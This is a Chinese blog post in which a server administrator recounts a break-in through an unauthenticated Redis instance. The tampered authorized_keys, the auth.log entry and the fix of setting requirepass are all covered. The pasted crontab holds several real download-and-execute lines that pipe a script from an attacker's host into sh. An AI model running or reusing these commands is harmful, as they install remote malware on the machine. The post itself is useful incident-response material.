技术饭

linux下定时任务crontab乱码,都是redis的乱码

copylian    3 评论    7484 浏览    2019.03.02

收到阿里云的异地登录通知, 立即登录服务器查看情况. 第一反映就是之前设置的 authorized_keys 无效了. 只能用密码登录.用密码登录以后, who只能看到我自己, 发现authorized_keys被修改(乱码).

第一时间修改了 root 密码, 删除了authorized_keys所有内容, 修改 sshd 端口.

histroy没有被删除, 但只有一条cat /proc/cpuinfo不是我的.

查看了/var/log/auth.log, 发现:

Accepted publickey for root from 171.217.45.80 port 26544 ssh2: RSA SHA256:EfMgrPiclfg8uphA89LwNg6IdLmjraeCahKHBkzKols

这个登录记录登录 7 秒就主动退出.

然后authorized_keys每断时间就会被之前的乱码填充.

crontab 发现如下任务:

REDIS0008�      redis-ver4.0.8�
�edis-bits�@�ctime½��Zused-mem��_
aof-preamble���bXSzU;
*/5 * * * * wget -q -O- http://img.namunil.com/ash.php|sh
itAunMj:
*/2 * * * * curl -fsSL http://img.namunil.com/ash.php|sh
TmwCGL;
*/3 * * * * wget -q -O- http://img.namunil.com/ash.php|sh
CrqIHE:
*/4 * * * * curl -fsSL http://img.namunil.com/ash.php|sh
���q0{}��root@iZj6ccp3jft7zfn5dpr1gxZ:~# crontab -h

删除 crontab 任务之后, authorized_keys 还是会自动被修改.

现在迷茫, 不知道根源来自哪里.

微信图片_20190302173549.png

解决方案:

由于服务器之前没有设置redis的requirepass,所以导致了服务器被攻击,修改 redis.conf 配置设置 requirepass,重启redis即可。

飓风呀
感谢你的支持,我会继续努力!
扫码打赏,感谢您的支持!

文明上网理性发言!